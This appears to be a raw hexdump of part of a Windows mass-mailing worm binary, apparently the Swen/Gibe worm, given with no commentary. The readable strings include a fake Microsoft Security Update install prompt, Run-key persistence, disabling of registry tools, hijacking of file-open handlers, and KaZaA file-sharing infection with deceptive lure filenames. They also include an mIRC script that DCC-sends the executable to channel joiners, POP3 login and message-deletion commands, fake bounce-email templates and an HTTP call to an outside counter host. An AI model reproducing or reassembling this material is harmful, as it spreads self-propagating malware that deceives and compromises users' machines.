00011320  79 6f 75 20 74 68 61 74  20 3d 0d 0a 00 00 00 00  |you that =......|
00011330  3c 42 52 3e 49 27 6d 20  73 6f 72 72 79 20 3d 0d  |<BR>I'm sorry =.|
00011340  0a 00 00 00 0d 0a 3c 42  52 3e 00 00 3c 42 52 3e  |......<BR>..<BR>|
00011350  4d 65 73 73 61 67 65 20  66 72 6f 6d 20 00 00 00  |Message from ...|
00011360  3c 42 52 3e 54 68 69 73  20 69 73 20 74 68 65 20  |<BR>This is the |
00011370  71 6d 61 69 6c 20 70 72  6f 67 72 61 6d 3c 42 52  |qmail program<BR|
00011380  3e 0d 0a 00 3c 42 52 3e  3c 42 52 3e 48 69 2e 0d  |>...<BR><BR>Hi..|
00011390  0a 00 00 00 22 20 68 65  69 67 68 74 3d 33 44 30  |...." height=3D0|
000113a0  20 77 69 64 74 68 3d 33  44 30 3e 3c 2f 69 66 72  | width=3D0></ifr|
000113b0  61 6d 65 3e 0d 0a 00 00  3c 69 66 72 61 6d 65 20  |ame>....<iframe |
000113c0  73 72 63 3d 33 44 22 63  69 64 3a 00 3c 48 54 4d  |src=3D"cid:.<HTM|
000113d0  4c 3e 0d 0a 3c 48 45 41  44 3e 3c 2f 48 45 41 44  |L>..<HEAD></HEAD|
000113e0  3e 0d 0a 3c 42 4f 44 59  3e 0d 0a 00 0d 0a 4d 69  |>..<BODY>.....Mi|
000113f0  6d 65 2d 56 65 72 73 69  6f 6e 3a 20 31 2e 30 0d  |me-Version: 1.0.|
00011400  0a 43 6f 6e 74 65 6e 74  2d 54 79 70 65 3a 20 6d  |.Content-Type: m|
00011410  75 6c 74 69 70 61 72 74  2f 61 6c 74 65 72 6e 61  |ultipart/alterna|
00011420  74 69 76 65 3b 0d 0a 09  62 6f 75 6e 64 61 72 79  |tive;...boundary|
00011430  3d 22 00 00 4e 6f 74 69  63 65 00 00 52 65 70 6f  |="..Notice..Repo|
00011440  72 74 00 00 41 6e 6e 6f  75 6e 63 65 6d 65 6e 74  |rt..Announcement|
00011450  00 00 00 00 41 64 76 69  63 65 00 00 4c 65 74 74  |....Advice..Lett|
00011460  65 72 00 00 46 61 69 6c  75 72 65 20 00 00 00 00  |er..Failure ....|
00011470  41 62 6f 72 74 20 00 00  45 72 72 6f 72 20 00 00  |Abort ..Error ..|
00011480  42 75 67 20 00 00 00 00  20 55 73 65 72 20 75 6e  |Bug .... User un|
00011490  6b 6e 6f 77 6e 00 00 00  4d 61 69 6c 65 72 00 00  |known...Mailer..|
000114a0  53 65 6e 64 65 72 00 00  20 52 65 74 75 72 6e 65  |Sender.. Returne|
000114b0  64 20 54 6f 20 00 00 00  4d 65 73 73 61 67 65 00  |d To ...Message.|
000114c0  4d 61 69 6c 00 00 00 00  55 6e 64 65 6c 69 76 65  |Mail....Undelive|
000114d0  72 65 64 20 00 00 00 00  55 6e 64 65 6c 69 76 65  |red ....Undelive|
000114e0  72 61 62 6c 65 20 00 00  52 65 74 75 72 6e 65 64  |rable ..Returned|
000114f0  20 00 00 00 3e 0d 0a 53  55 42 4a 45 43 54 3a 20  | ...>..SUBJECT: |
00011500  00 00 00 00 64 6f 6d 61  69 6e 00 00 73 65 72 76  |....domain..serv|
00011510  65 72 00 00 68 6f 6d 65  00 00 00 00 6d 78 00 00  |er..home....mx..|
00011520  79 6f 75 72 00 00 00 00  75 73 65 72 00 00 00 00  |your....user....|
00011530  72 65 63 65 69 76 65 72  00 00 00 00 72 65 63 69  |receiver....reci|
00011540  70 69 65 6e 74 00 00 00  63 6c 69 65 6e 74 00 00  |pient...client..|
00011550  52 65 63 65 69 76 65 72  00 00 00 00 52 65 63 69  |Receiver....Reci|
00011560  70 69 65 6e 74 00 00 00  70 75 72 65 6d 61 69 6c  |pient...puremail|
00011570  00 00 00 00 61 6d 65 72  69 63 61 00 6e 65 74 6d  |....america.netm|
00011580  61 69 6c 00 66 72 65 65  6d 61 69 6c 00 00 00 00  |ail.freemail....|
00011590  79 61 68 6f 6f 00 00 00  61 6f 6c 00 62 69 67 66  |yahoo...aol.bigf|
000115a0  6f 6f 74 00 72 6f 63 6b  65 74 6d 61 69 6c 00 00  |oot.rocketmail..|
000115b0  62 6f 74 00 72 6f 75 74  69 6e 65 00 70 72 6f 67  |bot.routine.prog|
000115c0  72 61 6d 00 64 61 65 6d  6f 6e 00 00 72 6f 62 6f  |ram.daemon..robo|
000115d0  74 00 00 00 61 75 74 6f  6d 61 74 00 65 6e 67 69  |t...automat.engi|
000115e0  6e 65 00 00 66 6f 72 6d  00 00 00 00 73 65 72 76  |ne..form....serv|
000115f0  69 63 65 00 70 6f 73 74  00 00 00 00 77 65 62 00  |ice.post....web.|
00011600  73 6d 74 70 00 00 00 00  65 6d 61 69 6c 00 00 00  |smtp....email...|
00011610  6d 61 69 6c 65 72 00 00  6d 61 73 74 65 72 00 00  |mailer..master..|
00011620  6d 61 69 6c 00 00 00 00  53 79 73 74 65 6d 00 00  |mail....System..|
00011630  53 65 72 76 69 63 65 00  44 65 6c 69 76 65 72 79  |Service.Delivery|
00011640  20 00 00 00 53 74 6f 72  61 67 65 20 00 00 00 00  | ...Storage ....|
00011650  4d 61 69 6c 20 00 00 00  4d 65 73 73 61 67 65 20  |Mail ...Message |
00011660  00 00 00 00 45 6d 61 69  6c 20 00 00 49 6e 65 74  |....Email ..Inet|
00011670  20 00 00 00 50 6f 73 74  6d 61 73 74 65 72 00 00  | ...Postmaster..|
00011680  41 64 6d 69 6e 69 73 74  72 61 74 6f 72 00 00 00  |Administrator...|
00011690  41 64 6d 69 6e 00 00 00  47 45 54 20 68 74 74 70  |Admin...GET http|
000116a0  3a 2f 2f 77 77 32 2e 66  63 65 2e 76 75 74 62 72  |://ww2.fce.vutbr|
000116b0  2e 63 7a 2f 62 69 6e 2f  63 6f 75 6e 74 65 72 2e  |.cz/bin/counter.|
000116c0  67 69 66 2f 6c 69 6e 6b  3d 62 61 63 69 6c 6c 75  |gif/link=bacillu|
000116d0  73 26 77 69 64 74 68 3d  36 26 73 65 74 3d 63 6e  |s&width=6&set=cn|
000116e0  74 30 30 36 20 48 54 54  50 2f 31 2e 30 0d 0a 0d  |t006 HTTP/1.0...|
000116f0  0a 00 00 00 77 77 32 2e  66 63 65 2e 76 75 74 62  |....ww2.fce.vutb|
00011700  72 2e 63 7a 00 00 00 00  44 45 4c 45 20 25 64 0d  |r.cz....DELE %d.|
00011710  0a 00 00 00 54 4f 50 20  25 64 20 33 30 0d 0a 00  |....TOP %d 30...|
00011720  2b 4f 4b 20 00 00 00 00  53 54 41 54 0d 0a 00 00  |+OK ....STAT....|
00011730  50 41 53 53 20 25 73 0d  0a 00 00 00 55 53 45 52  |PASS %s.....USER|
00011740  20 25 73 0d 0a 00 00 00  73 68 6f 77 65 72 72 6f  | %s.....showerro|
00011750  72 00 00 00 61 75 74 6f  72 75 6e 00 58 2d 49 44  |r...autorun.X-ID|
00011760  00 00 00 00 50 4f 50 20  53 65 72 76 65 72 00 00  |....POP Server..|
00011770  50 61 73 73 00 00 00 00  4c 6f 67 69 6e 00 00 00  |Pass....Login...|
00011780  43 6f 75 6e 74 65 72 20  56 69 73 69 74 65 64 00  |Counter Visited.|
00011790  79 65 73 00 43 61 63 68  65 42 6f 78 20 4f 75 74  |yes.CacheBox Out|
000117a0  66 69 74 00 56 69 63 4e  61 6d 65 00 5a 69 70 4e  |fit.VicName.ZipN|
000117b0  61 6d 65 00 53 65 72 76  65 72 00 00 45 6d 61 69  |ame.Server..Emai|
000117c0  6c 20 41 64 64 72 65 73  73 00 00 00 45 78 70 6c  |l Address...Expl|
000117d0  6f 72 65 72 20 58 42 61  73 65 42 61 72 00 00 00  |orer XBaseBar...|
000117e0  25 73 5c 73 77 65 6e 31  2e 64 61 74 00 00 00 00  |%s\swen1.dat....|
000117f0  25 73 5c 73 77 65 6e 30  2e 64 61 74 00 00 00 00  |%s\swen0.dat....|
00011800  25 73 5c 6e 6e 74 70 67  72 6f 75 70 73 2e 64 61  |%s\nntpgroups.da|
00011810  74 00 00 00 25 73 5c 67  65 72 6d 73 30 2e 64 62  |t...%s\germs0.db|
00011820  76 00 00 00 32 31 35 00  4c 49 53 54 0d 0a 00 00  |v...215.LIST....|
00011830  5b 25 73 3a 25 63 5d 0d  0a 00 00 00 32 30 00 00  |[%s:%c].....20..|
00011840  2e 0d 0a 00 32 33 30 00  20 47 4d 54 00 00 00 00  |....230. GMT....|
00011850  4e 45 57 4e 45 57 53 20  25 73 20 25 30 32 75 25  |NEWNEWS %s %02u%|
00011860  30 32 75 25 30 32 75 20  25 30 32 75 25 30 32 75  |02u%02u %02u%02u|
00011870  25 30 32 75 00 00 00 00  32 31 31 00 4c 49 53 54  |%02u....211.LIST|
00011880  47 52 4f 55 50 20 25 73  0d 0a 00 00 32 32 31 00  |GROUP %s....221.|
00011890  0d 0a 72 65 70 6c 79 2d  74 6f 3a 00 0d 0a 66 72  |..reply-to:...fr|
000118a0  6f 6d 3a 00 32 34 30 00  33 34 30 00 50 4f 53 54  |om:.240.340.POST|
000118b0  0d 0a 00 00 2c 00 00 00  45 72 72 6f 72 20 6f 63  |....,...Error oc|
000118c0  63 75 72 72 65 64 00 00  4d 65 6d 6f 72 79 20 61  |curred..Memory a|
000118d0  63 63 65 73 73 20 76 69  6f 6c 61 74 69 6f 6e 20  |ccess violation |
000118e0  69 6e 20 6d 6f 64 75 6c  65 20 6b 65 72 6e 65 6c  |in module kernel|
000118f0  33 32 20 61 74 20 00 00  52 65 67 69 73 74 65 72  |32 at ..Register|
00011900  53 65 72 76 69 63 65 50  72 6f 63 65 73 73 00 00  |ServiceProcess..|
00011910  5c 00 00 00 53 4f 46 54  57 41 52 45 5c 4d 69 63  |\...SOFTWARE\Mic|
00011920  72 6f 73 6f 66 74 5c 57  69 6e 64 6f 77 73 5c 43  |rosoft\Windows\C|
00011930  75 72 72 65 6e 74 56 65  72 73 69 6f 6e 5c 45 78  |urrentVersion\Ex|
00011940  70 6c 6f 72 65 72 00 00  52 65 6d 6f 74 65 20 43  |plorer..Remote C|
00011950  6f 6e 6e 65 63 74 69 6f  6e 00 00 00 53 79 73 74  |onnection...Syst|
00011960  65 6d 5c 43 75 72 72 65  6e 74 43 6f 6e 74 72 6f  |em\CurrentContro|
00011970  6c 53 65 74 5c 53 65 72  76 69 63 65 73 5c 52 65  |lSet\Services\Re|
00011980  6d 6f 74 65 41 63 63 65  73 73 00 00 57 69 6e 64  |moteAccess..Wind|
00011990  6f 77 73 20 45 78 70 6c  6f 72 65 72 00 00 00 00  |ows Explorer....|
000119a0  49 6e 74 65 72 6e 65 74  43 6c 6f 73 65 48 61 6e  |InternetCloseHan|
000119b0  64 6c 65 00 49 6e 74 65  72 6e 65 74 47 65 74 43  |dle.InternetGetC|
000119c0  6f 6e 6e 65 63 74 65 64  53 74 61 74 65 00 00 00  |onnectedState...|
000119d0  49 6e 74 65 72 6e 65 74  4f 70 65 6e 41 00 00 00  |InternetOpenA...|
000119e0  77 69 6e 69 6e 65 74 2e  64 6c 6c 00 4d 41 50 49  |wininet.dll.MAPI|
000119f0  33 32 00 00 49 6e 76 61  6c 69 64 20 45 6d 61 69  |32..Invalid Emai|
00011a00  6c 20 41 64 64 72 65 73  73 00 00 00 49 6e 76 61  |l Address...Inva|
00011a10  6c 69 64 20 53 65 72 76  65 72 20 4e 61 6d 65 00  |lid Server Name.|
00011a20  50 61 73 73 77 6f 72 64  73 20 64 6f 20 6e 6f 74  |Passwords do not|
00011a30  20 6d 61 74 63 68 00 00  71 00 00 00 51 00 00 00  | match..q...Q...|
00011a40  61 63 6b 00 61 74 63 68  00 00 00 00 70 00 00 00  |ack.atch....p...|
00011a50  50 00 00 00 70 67 72 61  64 65 00 00 70 64 61 74  |P...pgrade..pdat|
00011a60  65 00 00 00 75 00 00 00  55 00 00 00 6e 73 74 61  |e...u...U...nsta|
00011a70  6c 6c 00 00 6e 73 74 61  6c 6c 61 74 69 6f 6e 00  |ll..nstallation.|
00011a80  6e 73 74 61 6c 6c 65 72  00 00 00 00 69 00 00 00  |nstaller....i...|
00011a90  49 00 00 00 28 29 3c 3e  2c 3b 3a 5c 22 5b 5d 00  |I...()<>,;:\"[].|
00011aa0  64 65 6c 65 74 65 00 00  73 70 61 6d 00 00 00 00  |delete..spam....|
00011ab0  2e 65 6d 6c 00 00 00 00  2e 77 61 62 00 00 00 00  |.eml.....wab....|
00011ac0  2e 64 62 78 00 00 00 00  2e 6d 62 78 00 00 00 00  |.dbx.....mbx....|
00011ad0  61 73 70 00 68 74 00 00  2e 2e 00 00 5c 2a 00 00  |asp.ht......\*..|
00011ae0  6d 61 69 6c 74 6f 3a 00  28 29 3c 3e 2c 3b 3a 5c  |mailto:.()<>,;:\|
00011af0  22 5b 5d 3f 40 00 00 00  25 73 0d 0a 00 00 00 00  |"[]?@...%s......|
00011b00  55 6e 66 69 6c 65 00 00  41 6c 6c 20 55 73 65 72  |Unfile..All User|
00011b10  73 00 00 00 44 65 66 61  75 6c 74 20 55 73 65 72  |s...Default User|
00011b20  00 00 00 00 5c 41 6c 6c  20 55 73 65 72 73 00 00  |....\All Users..|
00011b30  57 69 6e 4d 65 00 00 00  57 69 6e 39 35 00 00 00  |WinMe...Win95...|
00011b40  57 69 6e 39 38 00 00 00  53 74 61 72 74 75 70 00  |Win98...Startup.|
00011b50  5c 53 68 65 6c 6c 20 46  6f 6c 64 65 72 73 00 00  |\Shell Folders..|
00011b60  61 62 63 64 65 66 67 68  6a 6b 6c 6d 6e 6f 72 73  |abcdefghjklmnors|
00011b70  74 76 77 78 79 7a 00 00  57 69 6e 6e 74 5c 50 72  |tvwxyz..Winnt\Pr|
00011b80  6f 66 69 6c 65 73 5c 00  44 6f 63 75 6d 65 6e 74  |ofiles\.Document|
00011b90  73 20 61 6e 64 20 53 65  74 74 69 6e 67 73 5c 00  |s and Settings\.|
00011ba0  5c 53 74 61 72 74 20 6d  65 6e 75 5c 50 72 6f 67  |\Start menu\Prog|
00011bb0  72 61 6d 73 5c 53 74 61  72 74 75 70 00 00 00 00  |rams\Startup....|
00011bc0  56 69 72 75 73 20 47 65  6e 65 72 61 74 6f 72 00  |Virus Generator.|
00011bd0  4d 61 67 69 63 20 4d 75  73 68 72 6f 6f 6d 73 20  |Magic Mushrooms |
00011be0  47 72 6f 77 69 6e 67 00  43 6f 6f 6b 69 6e 67 20  |Growing.Cooking |
00011bf0  77 69 74 68 20 43 61 6e  6e 61 62 69 73 00 00 00  |with Cannabis...|
00011c00  48 61 6c 6c 75 63 69 6e  6f 67 65 6e 69 63 20 53  |Hallucinogenic S|
00011c10  63 72 65 65 6e 73 61 76  65 72 00 00 4d 79 20 6e  |creensaver..My n|
00011c20  61 6b 65 64 20 73 69 73  74 65 72 00 58 58 58 20  |aked sister.XXX |
00011c30  50 69 63 74 75 72 65 73  00 00 00 00 53 69 63 6b  |Pictures....Sick|
00011c40  20 4a 6f 6b 65 00 00 00  58 58 58 20 56 69 64 65  | Joke...XXX Vide|
00011c50  6f 00 00 00 58 50 20 75  70 64 61 74 65 00 00 00  |o...XP update...|
00011c60  45 6d 75 6c 61 74 6f 72  20 50 53 32 00 00 00 00  |Emulator PS2....|
00011c70  58 62 6f 58 20 45 6d 75  6c 61 74 6f 72 00 00 00  |XboX Emulator...|
00011c80  53 65 78 00 48 61 72 64  50 6f 72 6e 00 00 00 00  |Sex.HardPorn....|
00011c90  4a 65 6e 6e 61 20 4a 61  6d 65 73 6f 6e 00 00 00  |Jenna Jameson...|
00011ca0  31 30 2e 30 30 30 20 53  65 72 69 61 6c 73 00 00  |10.000 Serials..|
00011cb0  48 6f 74 6d 61 69 6c 20  68 61 63 6b 65 72 00 00  |Hotmail hacker..|
00011cc0  59 61 68 6f 6f 20 68 61  63 6b 65 72 00 00 00 00  |Yahoo hacker....|
00011cd0  41 4f 4c 20 68 61 63 6b  65 72 00 00 66 69 78 74  |AOL hacker..fixt|
00011ce0  6f 6f 6c 00 63 6c 65 61  6e 65 72 00 72 65 6d 6f  |ool.cleaner.remo|
00011cf0  76 61 6c 20 74 6f 6f 6c  00 00 00 00 72 65 6d 6f  |val tool....remo|
00011d00  76 65 72 00 4b 6c 65 7a  00 00 00 00 53 6f 62 69  |ver.Klez....Sobi|
00011d10  67 00 00 00 53 69 72 63  61 6d 00 00 47 69 62 65  |g...Sircam..Gibe|
00011d20  00 00 00 00 59 61 68 61  00 00 00 00 42 75 67 62  |....Yaha....Bugb|
00011d30  65 61 72 00 69 6e 73 74  61 6c 6c 65 72 00 00 00  |ear.installer...|
00011d40  75 70 6c 6f 61 64 00 00  77 61 72 65 7a 00 00 00  |upload..warez...|
00011d50  68 61 63 6b 65 64 00 00  68 61 63 6b 00 00 00 00  |hacked..hack....|
00011d60  6b 65 79 20 67 65 6e 65  72 61 74 6f 72 00 00 00  |key generator...|
00011d70  57 69 6e 64 6f 77 73 20  4d 65 64 69 61 20 50 6c  |Windows Media Pl|
00011d80  61 79 65 72 00 00 00 00  47 65 74 52 69 67 68 74  |ayer....GetRight|
00011d90  20 46 54 50 00 00 00 00  44 6f 77 6e 6c 6f 61 64  | FTP....Download|
00011da0  20 41 63 63 65 6c 65 72  61 74 6f 72 00 00 00 00  | Accelerator....|
00011db0  4d 69 72 63 00 00 00 00  57 69 6e 61 6d 70 00 00  |Mirc....Winamp..|
00011dc0  57 69 6e 5a 69 70 00 00  57 69 6e 52 61 72 00 00  |WinZip..WinRar..|
00011dd0  4b 61 5a 61 41 00 00 00  4b 61 5a 61 41 20 6d 65  |KaZaA...KaZaA me|
00011de0  64 69 61 20 64 65 73 6b  74 6f 70 00 4b 61 7a 61  |dia desktop.Kaza|
00011df0  61 20 4c 69 74 65 00 00  53 65 61 72 63 68 69 6e  |a Lite..Searchin|
00011e00  67 20 66 6f 72 20 69 6e  73 74 61 6c 6c 65 64 20  |g for installed |
00011e10  63 6f 6d 70 6f 6e 65 6e  74 73 20 2e 2e 2e 00 00  |components .....|
00011e20  45 78 74 72 61 63 74 69  6e 67 20 66 69 6c 65 73  |Extracting files|
00011e30  20 2e 2e 2e 00 00 00 00  43 6f 70 79 69 6e 67 20  | .......Copying |
00011e40  66 69 6c 65 73 20 2e 2e  2e 00 00 00 55 70 64 61  |files ......Upda|
00011e50  74 69 6e 67 20 72 65 67  69 73 74 72 79 20 2e 2e  |ting registry ..|
00011e60  2e 00 00 00 25 73 25 73  2e 65 78 65 00 00 00 00  |....%s%s.exe....|
00011e70  25 73 5c 25 73 2e 7a 69  70 00 00 00 25 73 25 73  |%s\%s.zip...%s%s|
00011e80  2e 7a 69 70 00 00 00 00  30 31 32 33 34 35 3a 00  |.zip....012345:.|
00011e90  54 68 69 73 20 75 70 64  61 74 65 20 68 61 73 20  |This update has |
00011ea0  62 65 65 6e 20 73 75 63  63 65 73 73 66 75 6c 6c  |been successfull|
00011eb0  79 20 69 6e 73 74 61 6c  6c 65 64 2e 00 00 00 00  |y installed.....|
00011ec0  53 6f 66 74 77 61 72 65  5c 4d 69 63 72 6f 73 6f  |Software\Microso|
00011ed0  66 74 5c 57 69 6e 64 6f  77 73 5c 43 75 72 72 65  |ft\Windows\Curre|
00011ee0  6e 74 56 65 72 73 69 6f  6e 5c 50 6f 6c 69 63 69  |ntVersion\Polici|
00011ef0  65 73 5c 53 79 73 74 65  6d 00 00 00 44 69 73 61  |es\System...Disa|
00011f00  62 6c 65 52 65 67 69 73  74 72 79 54 6f 6f 6c 73  |bleRegistryTools|
00011f10  00 00 00 00 72 65 67 66  69 6c 65 5c 73 68 65 6c  |....regfile\shel|
00011f20  6c 5c 6f 70 65 6e 5c 63  6f 6d 6d 61 6e 64 00 00  |l\open\command..|
00011f30  25 73 20 73 68 6f 77 65  72 72 6f 72 00 00 00 00  |%s showerror....|
00011f40  73 63 72 66 69 6c 65 5c  73 68 65 6c 6c 5c 63 6f  |scrfile\shell\co|
00011f50  6e 66 69 67 5c 63 6f 6d  6d 61 6e 64 00 00 00 00  |nfig\command....|
00011f60  25 73 20 22 25 25 31 22  00 00 00 00 73 63 72 66  |%s "%%1"....scrf|
00011f70  69 6c 65 5c 73 68 65 6c  6c 5c 6f 70 65 6e 5c 63  |ile\shell\open\c|
00011f80  6f 6d 6d 61 6e 64 00 00  25 73 20 22 25 25 31 22  |ommand..%s "%%1"|
00011f90  20 2f 53 00 5c 73 68 65  6c 6c 5c 6f 70 65 6e 5c  | /S.\shell\open\|
00011fa0  63 6f 6d 6d 61 6e 64 00  65 78 65 66 69 6c 65 00  |command.exefile.|
00011fb0  63 6f 6d 66 69 6c 65 00  70 69 66 66 69 6c 65 00  |comfile.piffile.|
00011fc0  62 61 74 66 69 6c 65 00  25 73 20 22 25 25 31 22  |batfile.%s "%%1"|
00011fd0  20 25 25 2a 00 00 00 00  6e 6e 74 70 74 6d 70 2e  | %%*....nntptmp.|
00011fe0  66 6c 00 00 5c 73 77 65  6e 30 2e 64 61 74 00 00  |fl..\swen0.dat..|
00011ff0  4e 4e 54 50 20 53 65 72  76 65 72 00 53 4d 54 50  |NNTP Server.SMTP|
00012000  20 44 69 73 70 6c 61 79  20 4e 61 6d 65 00 00 00  | Display Name...|
00012010  53 4d 54 50 20 53 65 72  76 65 72 00 53 4d 54 50  |SMTP Server.SMTP|
00012020  20 45 6d 61 69 6c 20 41  64 64 72 65 73 73 00 00  | Email Address..|
00012030  53 4f 46 54 57 41 52 45  5c 4d 69 63 72 6f 73 6f  |SOFTWARE\Microso|
00012040  66 74 5c 49 6e 74 65 72  6e 65 74 20 41 63 63 6f  |ft\Internet Acco|
00012050  75 6e 74 20 4d 61 6e 61  67 65 72 5c 41 63 63 6f  |unt Manager\Acco|
00012060  75 6e 74 73 5c 25 73 00  30 30 30 30 30 30 30 31  |unts\%s.00000001|
00012070  00 00 00 00 44 65 66 61  75 6c 74 20 4e 65 77 73  |....Default News|
00012080  20 41 63 63 6f 75 6e 74  00 00 00 00 53 4f 46 54  | Account....SOFT|
00012090  57 41 52 45 5c 4d 69 63  72 6f 73 6f 66 74 5c 49  |WARE\Microsoft\I|
000120a0  6e 74 65 72 6e 65 74 20  41 63 63 6f 75 6e 74 20  |nternet Account |
000120b0  4d 61 6e 61 67 65 72 00  44 65 66 61 75 6c 74 20  |Manager.Default |
000120c0  4d 61 69 6c 20 41 63 63  6f 75 6e 74 00 00 00 00  |Mail Account....|
000120d0  4d 69 72 63 20 49 6e 73  74 61 6c 6c 20 46 6f 6c  |Mirc Install Fol|
000120e0  64 65 72 00 22 0d 0a 6e  33 3d 7d 0d 0a 00 00 00  |der."..n3=}.....|
000120f0  5b 73 63 72 69 70 74 5d  0d 0a 6e 30 3d 20 6f 6e  |[script]..n0= on|
00012100  20 31 3a 4a 4f 49 4e 3a  23 3a 7b 0d 0a 6e 31 3d  | 1:JOIN:#:{..n1=|
00012110  20 2f 69 66 20 28 20 24  6e 69 63 6b 20 3d 3d 20  | /if ( $nick == |
00012120  24 6d 65 20 29 20 7b 20  68 61 6c 74 20 7d 0d 0a  |$me ) { halt }..|
00012130  6e 32 3d 20 2f 2e 64 63  63 20 73 65 6e 64 20 24  |n2= /.dcc send $|
00012140  6e 69 63 6b 20 22 00 00  25 73 5c 25 73 2e 65 78  |nick "..%s\%s.ex|
00012150  65 00 00 00 5c 73 63 72  69 70 74 2e 62 63 70 00  |e...\script.bcp.|
00012160  5c 73 63 72 69 70 74 2e  69 6e 69 00 5c 6d 69 72  |\script.ini.\mir|
00012170  63 2e 69 6e 69 00 00 00  5c 6d 69 72 63 33 32 00  |c.ini...\mirc32.|
00012180  5c 6d 69 72 63 00 00 00  53 6f 66 74 77 61 72 65  |\mirc...Software|
00012190  5c 4d 69 63 72 6f 73 6f  66 74 5c 57 69 6e 64 6f  |\Microsoft\Windo|
000121a0  77 73 5c 43 75 72 72 65  6e 74 56 65 72 73 69 6f  |ws\CurrentVersio|
000121b0  6e 00 00 00 50 72 6f 67  72 61 6d 46 69 6c 65 73  |n...ProgramFiles|
000121c0  44 69 72 00 43 3a 00 00  4b 61 7a 61 61 20 49 6e  |Dir.C:..Kazaa In|
000121d0  66 65 63 74 00 00 00 00  44 69 72 39 39 00 00 00  |fect....Dir99...|
000121e0  44 6c 44 69 72 30 00 00  5c 54 72 61 6e 73 66 65  |DlDir0..\Transfe|
000121f0  72 00 00 00 44 6f 77 6e  6c 6f 61 64 44 69 72 00  |r...DownloadDir.|
00012200  44 69 73 61 62 6c 65 53  68 61 72 69 6e 67 00 00  |DisableSharing..|
00012210  5c 4c 6f 63 61 6c 43 6f  6e 74 65 6e 74 00 00 00  |\LocalContent...|
00012220  53 6f 66 74 77 61 72 65  5c 4b 61 7a 61 61 00 00  |Software\Kazaa..|
00012230  53 4f 46 54 57 41 52 45  5c 4d 69 63 72 6f 73 6f  |SOFTWARE\Microso|
00012240  66 74 5c 57 69 6e 64 6f  77 73 5c 43 75 72 72 65  |ft\Windows\Curre|
00012250  6e 74 56 65 72 73 69 6f  6e 5c 41 70 70 20 50 61  |ntVersion\App Pa|
00012260  74 68 73 5c 00 00 00 00  41 20 2d 45 50 20 25 73  |ths\....A -EP %s|
00012270  20 25 73 00 57 69 6e 52  61 72 2e 65 78 65 00 00  | %s.WinRar.exe..|
00012280  2d 6d 69 6e 20 2d 65 20  2d 6f 20 25 73 20 25 73  |-min -e -o %s %s|
00012290  00 00 00 00 57 69 6e 5a  69 70 2e 65 78 65 00 00  |....WinZip.exe..|
000122a0  0d 0a 40 45 43 48 4f 20  4f 46 46 0d 0a 49 46 20  |..@ECHO OFF..IF |
000122b0  4e 4f 54 20 22 25 25 31  22 3d 3d 22 22 20 25 73  |NOT "%%1"=="" %s|
000122c0  20 25 25 31 0d 0a 00 00  25 73 5c 25 73 2e 62 61  | %%1....%s\%s.ba|
000122d0  74 00 00 00 54 68 69 73  20 77 69 6c 6c 20 69 6e  |t...This will in|
000122e0  73 74 61 6c 6c 20 4d 69  63 72 6f 73 6f 66 74 20  |stall Microsoft |
000122f0  53 65 63 75 72 69 74 79  20 55 70 64 61 74 65 2e  |Security Update.|
00012300  0d 0a 0d 0a 44 6f 20 79  6f 75 20 77 69 73 68 20  |....Do you wish |
00012310  74 6f 20 63 6f 6e 74 69  6e 75 65 3f 00 00 00 00  |to continue?....|
00012320  49 6e 73 74 61 6c 6c 20  49 74 65 6d 00 00 00 00  |Install Item....|
00012330  53 6f 66 74 77 61 72 65  5c 4d 69 63 72 6f 73 6f  |Software\Microso|
00012340  66 74 5c 57 69 6e 64 6f  77 73 5c 43 75 72 72 65  |ft\Windows\Curre|
00012350  6e 74 56 65 72 73 69 6f  6e 5c 52 75 6e 00 00 00  |ntVersion\Run...|
00012360  25 73 20 61 75 74 6f 72  75 6e 00 00 54 68 69 73  |%s autorun..This|
00012370  20 75 70 64 61 74 65 20  64 6f 65 73 20 6e 6f 74  | update does not|
00012380  20 6e 65 65 64 20 74 6f  20 62 65 20 69 6e 73 74  | need to be inst|
00012390  61 6c 6c 65 64 20 6f 6e  20 74 68 69 73 20 73 79  |alled on this sy|
000123a0  73 74 65 6d 2e 00 00 00  4d 69 63 72 6f 73 6f 66  |stem....Microsof|
000123b0  74 20 49 6e 74 65 72 6e  65 74 20 55 70 64 61 74  |t Internet Updat|
000123c0  65 20 50 61 63 6b 00 00  2e 2e 2e 20 62 79 20 42  |e Pack..... by B|
000123d0  65 67 62 69 65 00 00 00  49 6e 73 74 61 6c 6c 65  |egbie...Installe|
000123e0  64 00 00 00 5b 72 65 6e  61 6d 65 5d 0d 0a 4e 55  |d...[rename]..NU|
000123f0  4c 3d 25 73 0d 0a 00 00  25 73 5c 57 69 6e 69 6e  |L=%s....%s\Winin|
00012400  69 74 2e 69 6e 69 00 00  4d 6f 76 65 46 69 6c 65  |it.ini..MoveFile|
00012410  45 78 41 00 72 65 67 65  64 69 74 2e 65 78 65 20  |ExA.regedit.exe |
00012420  22 25 31 22 00 00 00 00  22 25 31 22 00 00 00 00  |"%1"...."%1"....|
00012430  22 25 31 22 20 2f 53 00  22 25 31 22 20 25 2a 00  |"%1" /S."%1" %*.|
00012440  25 73 5c 73 63 72 69 70  74 2e 69 6e 69 00 00 00  |%s\script.ini...|
00012450  67 65 72 6d 73 30 2e 64  62 76 00 00 67 65 72 6d  |germs0.dbv..germ|
00012460  73 31 2e 64 62 76 00 00  73 77 65 6e 30 2e 64 61  |s1.dbv..swen0.da|
00012470  74 00 00 00 73 77 65 6e  31 2e 64 61 74 00 00 00  |t...swen1.dat...|
00012480  6e 6e 74 70 67 72 6f 75  70 73 2e 64 61 74 00 00  |nntpgroups.dat..|
00012490  20 05 93 19 00 00 00 00  00 00 00 00 00 00 00 00  | ...............|
000124a0  92 b1 40 00 02 00 00 00  b2 24 41 00 b2 24 41 00  |..@......$A..$A.|
000124b0  00 00 20 00 20 00 20 00  20 00 20 00 20 00 20 00  |.. . . . . . . .|
[....]
00014d80  c0 00 00 03 c0 00 00 03  c0 00 00 03 ff f0 07 ff  |................|
00014d90  ff f0 07 ff ff f0 07 ff  ff f0 07 ff ff f8 0f ff  |................|
00014da0  ff ff ff ff ff ff ff ff  00 00 01 00 01 00 20 20  |..............  |
00014db0  00 00 01 00 08 00 a8 08  00 00 03 00 00 00 00 00  |................|
00014dc0  d0 0a c8 80 00 00 00 00  1e 00 00 00 00 00 c4 01  |................|
00014dd0  c9 00 00 00 00 00 20 00  4d 00 41 00 50 00 49 00  |...... .M.A.P.I.|
00014de0  33 00 32 00 20 00 45 00  78 00 63 00 65 00 70 00  |3.2. .E.x.c.e.p.|
00014df0  74 00 69 00 6f 00 6e 00  00 00 08 00 4d 00 53 00  |t.i.o.n.....M.S.|
